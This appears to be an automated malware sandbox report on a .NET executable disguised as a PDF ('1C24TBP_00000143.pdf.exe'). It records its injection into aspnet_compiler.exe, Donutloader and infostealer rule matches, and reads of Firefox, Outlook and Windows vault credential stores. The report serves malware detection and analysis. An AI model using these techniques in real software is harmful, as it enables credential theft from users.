Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0000016985B2FBA8	4_2_0000016985B2FBA8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00007FFD3498014F	4_2_00007FFD3498014F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00007FFD349774A5	4_2_00007FFD349774A5
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00007FFD34977E08	4_2_00007FFD34977E08
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00007FFD34984DF9	4_2_00007FFD34984DF9
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00007FFD34999560	4_2_00007FFD34999560
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00007FFD3497D968	4_2_00007FFD3497D968
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00007FFD34975972	4_2_00007FFD34975972
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00007FFD34983708	4_2_00007FFD34983708
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00007FFD34983718	4_2_00007FFD34983718
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00007FFD34989F45	4_2_00007FFD34989F45
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00007FFD34983748	4_2_00007FFD34983748
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00007FFD3497CE8A	4_2_00007FFD3497CE8A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00007FFD3497F506	4_2_00007FFD3497F506
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00007FFD3497F4F0	4_2_00007FFD3497F4F0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00007FFD3497D090	4_2_00007FFD3497D090
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00007FFD3498B08D	4_2_00007FFD3498B08D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00007FFD3498198D	4_2_00007FFD3498198D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00007FFD34980174	4_2_00007FFD34980174
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00007FFD34986577	4_2_00007FFD34986577
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00007FFD3497D9C5	4_2_00007FFD3497D9C5
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00007FFD349865A1	4_2_00007FFD349865A1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00007FFD34977DA0	4_2_00007FFD34977DA0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00007FFD34977F50	4_2_00007FFD34977F50
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00007FFD34987686	4_2_00007FFD34987686
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00007FFD3498B00E	4_2_00007FFD3498B00E
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00007FFD3497B3E0	4_2_00007FFD3497B3E0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00007FFD34974BC6	4_2_00007FFD34974BC6

Source: 1C24TBP_00000143.pdf.exe

Static PE information: No import functions for PE file found

Source: 1C24TBP_00000143.pdf.exe, 00000000.00000002.2638682795.000001F410B67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 1C24TBP_00000143.pdf.exe
Source: 1C24TBP_00000143.pdf.exe, 00000000.00000002.2650423134.000001F47A980000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 1C24TBP_00000143.pdf.exe
Source: 1C24TBP_00000143.pdf.exe, 00000000.00000002.2649795217.000001F47A890000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 1C24TBP_00000143.pdf.exe
Source: 1C24TBP_00000143.pdf.exe, 00000000.00000002.2630438443.000001F4004E6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 1C24TBP_00000143.pdf.exe
Source: 1C24TBP_00000143.pdf.exe, 00000000.00000000.2121017425.000001F478C60000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSelfmade.exe> vs 1C24TBP_00000143.pdf.exe
Source: 1C24TBP_00000143.pdf.exe, 00000000.00000002.2638682795.000001F4108B8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 1C24TBP_00000143.pdf.exe
Source: 1C24TBP_00000143.pdf.exe, 00000000.00000002.2638682795.000001F410AEF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 1C24TBP_00000143.pdf.exe
Source: 1C24TBP_00000143.pdf.exe, 00000000.00000002.2651588237.000001F47B470000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameVprojr.dll" vs 1C24TBP_00000143.pdf.exe
Source: 1C24TBP_00000143.pdf.exe	Binary or memory string: OriginalFilenameSelfmade.exe> vs 1C24TBP_00000143.pdf.exe

Source: 4.2.aspnet_compiler.exe.16987600000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.aspnet_compiler.exe.16987600000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000004.00000002.3383735891.0000016987600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000000.00000002.2630438443.000001F4005F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.2638682795.000001F410C2E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000004.00000002.3382363801.0000016985AF0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: 0.2.1C24TBP_00000143.pdf.exe.1f41046d370.6.raw.unpack, r8DMqxFJWaISmwcNpoC.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.1C24TBP_00000143.pdf.exe.1f41046d370.6.raw.unpack, r8DMqxFJWaISmwcNpoC.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.1C24TBP_00000143.pdf.exe.1f41046d370.6.raw.unpack, r8DMqxFJWaISmwcNpoC.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.1C24TBP_00000143.pdf.exe.1f41046d370.6.raw.unpack, r8DMqxFJWaISmwcNpoC.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.1C24TBP_00000143.pdf.exe.1f47a980000.9.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.1C24TBP_00000143.pdf.exe.1f47a980000.9.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.1C24TBP_00000143.pdf.exe.1f47a980000.9.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.1C24TBP_00000143.pdf.exe.1f47a980000.9.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 0.2.1C24TBP_00000143.pdf.exe.1f410b178c0.2.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.1C24TBP_00000143.pdf.exe.1f410b178c0.2.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 0.2.1C24TBP_00000143.pdf.exe.1f410b178c0.2.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.1C24TBP_00000143.pdf.exe.1f47a980000.9.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.1C24TBP_00000143.pdf.exe.1f47a980000.9.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.1C24TBP_00000143.pdf.exe.1f47a980000.9.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.1C24TBP_00000143.pdf.exe.1f410b678f8.5.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.1C24TBP_00000143.pdf.exe.1f410b678f8.5.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.1C24TBP_00000143.pdf.exe.1f47a980000.9.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.1C24TBP_00000143.pdf.exe.1f47a980000.9.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.1C24TBP_00000143.pdf.exe.1f410b678f8.5.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.1C24TBP_00000143.pdf.exe.1f47a980000.9.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.1C24TBP_00000143.pdf.exe.1f410b178c0.2.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.1C24TBP_00000143.pdf.exe.1f410b178c0.2.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.1C24TBP_00000143.pdf.exe.1f410b678f8.5.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.1C24TBP_00000143.pdf.exe.1f410b678f8.5.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.1C24TBP_00000143.pdf.exe.1f410b178c0.2.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.1C24TBP_00000143.pdf.exe.1f410b178c0.2.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.1C24TBP_00000143.pdf.exe.1f410b178c0.2.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.1C24TBP_00000143.pdf.exe.1f410b678f8.5.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/0@3/3

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6996:120:WilError_03

Source: 1C24TBP_00000143.pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 1C24TBP_00000143.pdf.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 1C24TBP_00000143.pdf.exe

ReversingLabs: Detection: 63%

Source: unknown	Process created: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe "C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe"
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"	Jump to behavior

Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: uxtheme.dll	Jump to behavior

Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: 1C24TBP_00000143.pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 1C24TBP_00000143.pdf.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 1C24TBP_00000143.pdf.exe, 00000000.00000002.2638682795.000001F410B67000.00000004.00000800.00020000.00000000.sdmp, 1C24TBP_00000143.pdf.exe, 00000000.00000002.2650423134.000001F47A980000.00000004.08000000.00040000.00000000.sdmp, 1C24TBP_00000143.pdf.exe, 00000000.00000002.2630438443.000001F4004E6000.00000004.00000800.00020000.00000000.sdmp, 1C24TBP_00000143.pdf.exe, 00000000.00000002.2638682795.000001F410AEF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 1C24TBP_00000143.pdf.exe, 00000000.00000002.2638682795.000001F410B67000.00000004.00000800.00020000.00000000.sdmp, 1C24TBP_00000143.pdf.exe, 00000000.00000002.2650423134.000001F47A980000.00000004.08000000.00040000.00000000.sdmp, 1C24TBP_00000143.pdf.exe, 00000000.00000002.2630438443.000001F4004E6000.00000004.00000800.00020000.00000000.sdmp, 1C24TBP_00000143.pdf.exe, 00000000.00000002.2638682795.000001F410AEF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: 1C24TBP_00000143.pdf.exe, 00000000.00000002.2649795217.000001F47A890000.00000004.08000000.00040000.00000000.sdmp, 1C24TBP_00000143.pdf.exe, 00000000.00000002.2638682795.000001F4108B8000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: 1C24TBP_00000143.pdf.exe, 00000000.00000002.2649795217.000001F47A890000.00000004.08000000.00040000.00000000.sdmp, 1C24TBP_00000143.pdf.exe, 00000000.00000002.2638682795.000001F4108B8000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

